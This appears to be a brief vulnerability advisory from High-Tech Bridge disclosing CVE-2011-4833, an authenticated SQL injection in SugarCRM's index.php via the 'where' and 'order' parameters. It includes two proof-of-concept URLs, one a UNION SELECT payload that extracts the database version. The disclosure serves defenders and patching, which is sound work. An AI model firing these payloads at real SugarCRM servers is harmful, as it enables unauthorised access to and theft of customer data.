High-Tech Bridge SA Security Research Lab has discovered vulnerability in SugarCRM, which can be exploited to perform SQL injection attacks.
- SQL Injection Vulnerability in SugarCRM: CVE-2011-4833
Input passed via the “where” and “order” GET parameters to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&wh ere=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ,67,68,69,70,71%20–%20
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&or der=SQL_CODE_HERE%20–%20
Successful exploitation of the vulnerabilities requires attacker to be registered and logged-in.